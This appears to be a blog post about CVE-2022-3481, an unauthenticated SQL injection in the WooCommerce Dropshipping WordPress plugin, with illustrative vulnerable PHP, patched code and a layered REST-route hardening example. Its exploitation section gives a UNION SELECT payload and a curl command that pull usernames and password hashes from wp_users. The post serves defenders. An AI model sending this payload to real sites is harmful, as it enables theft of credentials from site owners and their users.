The world of WordPress plugins is vast, but sometimes even popular plugins contain severe security flaws. One such flaw—CVE-2022-3481—was discovered in the WooCommerce Dropshipping plugin before version 4.4. This vulnerability allows attackers to exploit a REST API endpoint, injecting malicious SQL code, *even when not logged in*. Let's break it down in simple terms so everyone can understand:

How Did This Vulnerability Happen?

The plugin offered a REST API endpoint for certain dropshipping operations. Unfortunately, it failed to properly sanitize (clean up) and escape (make safe for use) an input parameter used in a SQL query. That means a malicious user could send crafted input and have their SQL commands run directly on the database—this could mean stealing data, modifying site content, or even gaining full access.

Here’s a simplified, illustrative example of what the vulnerable code might have looked like (not the plugin’s actual source):

```php
<?php
// VULNERABLE (illustration only): the request parameter is interpolated
// straight into the SQL string, so anything the client sends becomes SQL.
global $wpdb;
$order_id = $_GET['order_id']; // Value from user, NOT sanitized or validated
$query    = "SELECT * FROM {$wpdb->prefix}orders WHERE id = $order_id";
$results  = $wpdb->get_results($query);
```

In this example, `$_GET['order_id']` comes *directly* from the HTTP request, possibly from an unauthenticated visitor, and is used *unfiltered* in a SQL query. An attacker could send something like:

```
/wp-json/dropshipping/v1/order?order_id= UNION SELECT user_login,user_pass FROM wp_users--
```

Their SQL gets injected right into the query, which could let them retrieve usernames and hashed passwords.

Real-World Exploitation

Exploiting CVE-2022-3481 is as simple as sending a specially crafted HTTP request. Here’s an example using curl from the command line:

```
curl "https://victim.com/wp-json/dropshipping/v1/order?order_id=%20UNION%20SELECT%20user_login,user_pass%20FROM%20wp_users--"
```

Replace victim.com with a real site and watch as the WordPress database coughs up sensitive data in the response.

Patch & Mitigations

This vulnerability was fixed in version 4.4. If your site has an older version, *update NOW* from the plugin’s WordPress page!

Developers fixed the issue by using prepared statements and safe parameter handling, like this:

```php
<?php
// SAFE: cast the parameter to an integer, then bind it with $wpdb->prepare().
global $wpdb;
$order_id = intval($_GET['order_id']); // non-numeric input becomes 0
$query    = $wpdb->prepare(
    "SELECT * FROM {$wpdb->prefix}orders WHERE id = %d", // %d = integer placeholder
    $order_id
);
$results  = $wpdb->get_results($query);
```

With this pattern the value is cast to an integer and bound through a `%d` placeholder, so whatever a user sends, attacker-supplied text can never become part of the SQL statement.
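The snippet above shows the query layer only. A REST endpoint should also reject bad input before the callback runs and decide who may call it at all, since the original flaw was reachable without logging in. The following is an added example written for this article, not the plugin’s real code: it registers a route with WordPress’s `register_rest_route()` and layers argument validation, a permission check and `$wpdb->prepare()`. The namespace `dropshipping/v1`, the `/order` route, the `orders` table and the function name `example_ds_get_order` are assumptions taken from the URL shown earlier, not from the actual plugin.

```php
<?php
// Added example (not the plugin's own code). Namespace, route, table name and
// function names are assumptions for illustration.

add_action( 'rest_api_init', function () {
    register_rest_route( 'dropshipping/v1', '/order', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_ds_get_order',
        // Layer 1: authorisation. Only users with a shop-management capability
        // may call this route; anonymous requests get a 401/403 from WordPress.
        'permission_callback' => function () {
            return current_user_can( 'manage_woocommerce' );
        },
        // Layer 2: input validation. WP_REST_Request checks these rules before
        // the callback runs, so a non-numeric order_id never reaches our code.
        'args'                => array(
            'order_id' => array(
                'required'          => true,
                'type'              => 'integer',
                'sanitize_callback' => 'absint',
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
            ),
        ),
    ) );
} );

/**
 * Route callback: the only place the query is built, always via prepare().
 */
function example_ds_get_order( WP_REST_Request $request ) {
    global $wpdb;

    // Already sanitised by absint(); casting again costs nothing.
    $order_id = (int) $request->get_param( 'order_id' );

    // Layer 3: parameterised query. %d binds an integer, so text such as
    // "1 UNION SELECT ..." cannot become SQL even if layers 1 and 2 failed.
    // Identifiers cannot be bound, so the table prefix comes from $wpdb,
    // never from the request.
    $sql  = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}orders WHERE id = %d",
        $order_id
    );
    $rows = $wpdb->get_results( $sql, ARRAY_A );

    if ( empty( $rows ) ) {
        return new WP_Error( 'not_found', 'Order not found', array( 'status' => 404 ) );
    }
    return rest_ensure_response( $rows );
}
```

The `validate_callback` duplicates what `'type' => 'integer'` already enforces; it is kept to make the accepted shape explicit when reading the route definition. The important property is that the three layers are independent: a bug in the permission check or the validation rules does not reopen the injection, because the query is bound with `%d` regardless.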

Original References & Further Reading

- NVD CVE-2022-3481 details
- Wordfence Advisory
- Plugin homepage
- Read about SQL Injection basics (OWASP)

Conclusion

CVE-2022-3481 is a textbook example of why developers must *always* sanitize and escape input, and why site owners need to keep their plugins up to date. An unauthenticated attacker could break into your WordPress database *without needing to log in* thanks to one unprotected line of code.

If you have WooCommerce Dropshipping < 4.4 installed—patch it now! Don’t be an easy target.


*Got questions? Want to see example exploit code or need help securing your WordPress? Drop a comment below!*

Timeline

Published on: 11/07/2022 10:15:00 UTC
Last modified on: 12/20/2022 19:16:00 UTC